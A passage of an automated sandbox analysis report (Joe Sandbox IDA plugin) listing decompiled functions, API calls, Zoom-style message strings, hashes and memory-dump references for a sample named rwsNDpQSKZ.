                • Opcode ID: 28de14d8a050b15b8261599dd6e3b5fe5f7bf175d120cffdbc4b5a14ac6a1e07
                • Instruction ID: 50459348b647ff8deb745be5f9656ccf98e5ecc139a5963649ac1253bfe123b1
                • Opcode Fuzzy Hash: 28de14d8a050b15b8261599dd6e3b5fe5f7bf175d120cffdbc4b5a14ac6a1e07
                • Instruction Fuzzy Hash: BA41D234E00718ABCF15EFA4C84A6EDBB70AF45305F044118FC12AB391DF709A8ADB69
                Function 00C94872 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94879
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C7528B), ref: 00C9488D
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.pt.call.peer,00000044,00C7528B), ref: 00C948BF
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C948FC
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.pt.call.peer,?,-00000004), ref: 00C9492E
                • EnterCriticalSection.KERNEL32(00C7528B), ref: 00C949B0
                • LeaveCriticalSection.KERNEL32(00C7528B,?), ref: 00C949CD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C949E0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: IsDIDNumber$IsPrivacyName$Name$PhoneNumber$com.Zoom.app.conf.notify.pt.call.peer
                • API String ID: 1443623190-618993501
                • Opcode ID: b8909da49ce4d252360c6b0d0121155cc07973bba6180ba4e009d5651ce89b3a
                • Instruction ID: 98603ad9ddd70b00223e17f59fb462d48648b090a0a2c495396946e73764417d
                • Opcode Fuzzy Hash: b8909da49ce4d252360c6b0d0121155cc07973bba6180ba4e009d5651ce89b3a
                • Instruction Fuzzy Hash: 8D411734E007089BCF18EFA4D849ADEB774AF44305F054118E812A7391DF309E4BDB69
                Function 00C90970 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90977
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6FDDB), ref: 00C9098B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.response,00000044,00C6FDDB), ref: 00C909BD
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C909FA
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.response,?,-00000004), ref: 00C90A2C
                • EnterCriticalSection.KERNEL32(00C6FDDB), ref: 00C90AAE
                • LeaveCriticalSection.KERNEL32(00C6FDDB,?), ref: 00C90ACB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C90ADE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.response$result$signalType$sourceType$userID
                • API String ID: 1443623190-2890409769
                • Opcode ID: ebfdc62db105e97d72afcd40a9ddf558404a7b42e891b28f3c6b9c3f620ea20e
                • Instruction ID: 7d40fb52fba33f4afa6438e8cf1d54ecba674eca3573daf72cf47dd02e99fc0b
                • Opcode Fuzzy Hash: ebfdc62db105e97d72afcd40a9ddf558404a7b42e891b28f3c6b9c3f620ea20e
                • Instruction Fuzzy Hash: 02410135E003089FCF14EFA4D8496DEB7B4AF14315F104118E812BB391DF709A8AEBA9
                Function 00C8CA60 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8CA67
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6CACB), ref: 00C8CA7B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.cache.bytes.kv.op,00000044,00C6CACB), ref: 00C8CAAD
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8CAEA
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.cache.bytes.kv.op,?,-00000004), ref: 00C8CB1C
                • EnterCriticalSection.KERNEL32(00C6CACB), ref: 00C8CB9E
                • LeaveCriticalSection.KERNEL32(00C6CACB,?), ref: 00C8CBBB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C8CBCE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: action$bytes_value$com.Zoom.app.meeting.cache.bytes.kv.op$data_type$key
                • API String ID: 1443623190-3532546848
                • Opcode ID: 8423abc9bb281d6d0f51711ed443937cd661721ee635990cb3f04fe06d7a3fc0
                • Instruction ID: 9eff94b16d5374e3b48a66a4a10a937b8dd1285d4b6db1b96eabedfca591fc05
                • Opcode Fuzzy Hash: 8423abc9bb281d6d0f51711ed443937cd661721ee635990cb3f04fe06d7a3fc0
                • Instruction Fuzzy Hash: A341E435E007049BCF14EFA4C986AEDB7B4AF44309F044128E812B7381DF709A4ADBB9
                Function 00C96A7D Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C96A84
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C776BB), ref: 00C96A98
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.meeting.wallpaper.download_result,00000044,00C776BB), ref: 00C96ACA
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C96B07
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.meeting.wallpaper.download_result,?,-00000004), ref: 00C96B39
                • EnterCriticalSection.KERNEL32(00C776BB), ref: 00C96BBB
                • LeaveCriticalSection.KERNEL32(00C776BB,?), ref: 00C96BD8
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C96BEB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.meeting.wallpaper.download_result$error$status$type$wallpaper_id
                • API String ID: 1443623190-110998456
                • Opcode ID: 84d13cf2fa69ceb7d1d00d771ee09b48caa0142f9f7e896ffc9e4fdde9a2bf15
                • Instruction ID: 1af391dcc4c90f0e657b3244fef7d0da4611f0463b26991be9418fca6cc0678f
                • Opcode Fuzzy Hash: 84d13cf2fa69ceb7d1d00d771ee09b48caa0142f9f7e896ffc9e4fdde9a2bf15
                • Instruction Fuzzy Hash: 73410475E006089BCF15EFA4D9496DDB7B5AF04304F044128E812E73D1EF709B4AEBA5
                Function 00C90C5C Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90C63
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C7023B), ref: 00C90C77
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.notify.zpns.meeting.start,00000044,00C7023B), ref: 00C90CA9
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C90CE6
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.notify.zpns.meeting.start,?,-00000004), ref: 00C90D18
                • EnterCriticalSection.KERNEL32(00C7023B), ref: 00C90D9A
                • LeaveCriticalSection.KERNEL32(00C7023B,?), ref: 00C90DB7
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C90DCA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.pt.notify.zpns.meeting.start$meetingId$meetingNumber$originalMeetingNumber$strType
                • API String ID: 1443623190-116605177
                • Opcode ID: cf6ab81ae45eb69ec26f7a124966ba5d15ecd1c30e984f7514e64727d955239d
                • Instruction ID: b00f046496989a5b3aa6315893a72d825bd99b6658bbbe3935ff07e892138c94
                • Opcode Fuzzy Hash: cf6ab81ae45eb69ec26f7a124966ba5d15ecd1c30e984f7514e64727d955239d
                • Instruction Fuzzy Hash: 6741D375E013189FCF14EBA4C8496EDB770AF45305F144128EC12AB391DF70AA8ADB69
                Function 00C8EDD4 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8EDDB
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6EC7B), ref: 00C8EDEF
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response,00000044,00C6EC7B), ref: 00C8EE21
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8EE5E
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response,?,-00000004), ref: 00C8EE90
                • EnterCriticalSection.KERNEL32(00C6EC7B), ref: 00C8EF12
                • LeaveCriticalSection.KERNEL32(00C6EC7B,?), ref: 00C8EF2F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C8EF42
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: channelName$com.zoom.app.assistant.virtualaudio.message.unset.selected.device.response$deviceID$deviceType$result
                • API String ID: 1443623190-140503531
                • Opcode ID: 0a42cfcd485ac907270d6a7bde5af2706a301cb8f19fa6ec61dcc0ab918c0084
                • Instruction ID: a037b363e1b2034bed68d30bf4e1ae191dc7b1031437d57d48f7e969ec54a65b
                • Opcode Fuzzy Hash: 0a42cfcd485ac907270d6a7bde5af2706a301cb8f19fa6ec61dcc0ab918c0084
                • Instruction Fuzzy Hash: 3341F274E007199BCF14EFA4C8466DDB7B0AF54309F044118EC12AB391DF709A8ADB69
                Function 00CFA890 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: _free$Info
                • String ID:
                • API String ID: 2509303402-0
                • Opcode ID: 6239bda1bcb47b855a814404d348089f81bea5dad5aa0acab6eeca634e8dbac9
                • Instruction ID: d349b82b0c285d06a3d5a6db97d3640b4c0415526b68e3a02864e0b4d9495fb8
                • Opcode Fuzzy Hash: 6239bda1bcb47b855a814404d348089f81bea5dad5aa0acab6eeca634e8dbac9
                • Instruction Fuzzy Hash: 49D1A0B19003499FDB51CF64C881BFEFBF5BF08300F144069EA99A7292D771A945DB62
                Function 00CE2219 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 102libraryloadermemoryCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CE2220
                  • Part of subcall function 00CDC00B: GetProcessHeap.KERNEL32(?,00000000,00CDD955,00000004,00CDD727,00DFFBA8,?,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDC037
                  • Part of subcall function 00CDCE9E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,80004005,?,?,?,80070057,?,00CDCCE1,00000000,?,?,80070057,00000000), ref: 00CDCEB4
                  • Part of subcall function 00CE1DD5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(version.dll,00000000,00000800,?,?,00CE2245,00000000,00000014,00CDE0D1,?,?,?,00000028,00CDCA03,?,?), ref: 00CE1DF6
                  • Part of subcall function 00CE1DD5: SetLastError.KERNEL32(00000078,?,?,00CE2245,00000000,00000014,00CDE0D1,?,?,?,00000028,00CDCA03,?,?,?,?), ref: 00CE1E14
                • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeW), ref: 00CE2255
                • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoW), ref: 00CE2264
                • GetProcAddress.KERNEL32(00000000,VerQueryValueW), ref: 00CE2272
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,?,00000028,00CDCA03,?,?,?,?,?,?,?,?,?), ref: 00CE229D
                • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,00000028,00CDCA03,?,?,?,?,?,?,?,?,?), ref: 00CE22AB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000001,00000000,?,?,?,00000028,00CDCA03,?,?,?,?,?,?,?), ref: 00CE22C2
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00D35050,00000000,?,?,?,?,00000028,00CDCA03,?,?,?,?,?,?,?), ref: 00CE22E9
                • GlobalFree.KERNEL32(00000000), ref: 00CE231A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$AddressProc$Global$AllocErrorFreeH_prolog3HeapLastProcess
                • String ID: %u.%u.%u.%u$GetFileVersionInfoSizeW$GetFileVersionInfoW$VerQueryValueW
                • API String ID: 3352019735-4018623845
                • Opcode ID: 10cb8de4f028943ad9be902b78904dbcf3ce2529c516e3f92d791b34abf3ee7d
                • Instruction ID: 7818f859c0b21b25a70f2dfecea9666d4925e62ea2890743d551b4242c33e909
                • Opcode Fuzzy Hash: 10cb8de4f028943ad9be902b78904dbcf3ce2529c516e3f92d791b34abf3ee7d
                • Instruction Fuzzy Hash: 3A316A7590025AABCB11AFA5CC45BFE77B9BF08704F100419BA12A7291DF789E06DBB0
                Function 00CAE4C0 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 262threadtimeCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAE4CA
                • ??0StringPiece@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(UNKNOWN-FILE,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE4EE
                  • Part of subcall function 00C59F30: __EH_prolog3_catch.LIBCMT ref: 00C59F37
                • GetTickCount.KERNEL32 ref: 00CAE6C7
                  • Part of subcall function 00CAEB10: __EH_prolog3_catch.LIBCMT ref: 00CAEB17
                  • Part of subcall function 00CAEB10: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,00000002,00004000,?,?,?,?,0000002C,00CAE6D7,00000000,00000000,?,?,000000C4), ref: 00CAEB94
                  • Part of subcall function 00CA21D0: __EH_prolog3_catch.LIBCMT ref: 00CA21D7
                • GetCurrentProcessId.KERNEL32(?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE518
                  • Part of subcall function 00C52FC0: __EH_prolog3_catch.LIBCMT ref: 00C52FC7
                  • Part of subcall function 00C52FC0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,00000028,00C64738), ref: 00C53042
                  • Part of subcall function 00C5A0A6: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,00000000,?,00C64731), ref: 00C5A0BC
                • GetCurrentThreadId.KERNEL32 ref: 00CAE538
                • ?LocalExplode@Time@Cmm@@QBEXPAUExploded@12@@Z.RWSNDPQSKZ(?,?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE579
                • _strrchr.LIBCMT ref: 00CAE712
                • _strrchr.LIBCMT ref: 00CAE720
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000000,00000001,00000002,?,?,00000000,?,?,000000C4,00CAE29E,?,?,?,00000004), ref: 00CAE795
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$H_prolog3_catchState@Unlock@$Current_strrchr$CountExplode@Exploded@12@@H_prolog3_LocalPiece@ProcessStringThreadTickTime@
                • String ID: )] $UNKNOWN-FILE$VERBOSE
                • API String ID: 2999954814-3026634520
                • Opcode ID: 3b3c86148024168acbc52c2174eae718b8889841e37972f323b70350ae4b253e
                • Instruction ID: 2eab097a7ecbf65097a40065a7823c19bdb841730c9c31ca52fe58f0a2fda6d3
                • Opcode Fuzzy Hash: 3b3c86148024168acbc52c2174eae718b8889841e37972f323b70350ae4b253e
                • Instruction Fuzzy Hash: FF91CF31A00214ABCF18ABF4E856B9E77F6AF49304F04452DF506EB386DE349D89DB58
                Function 00C8EAC0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 124COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8EAC7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C8EAE7
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
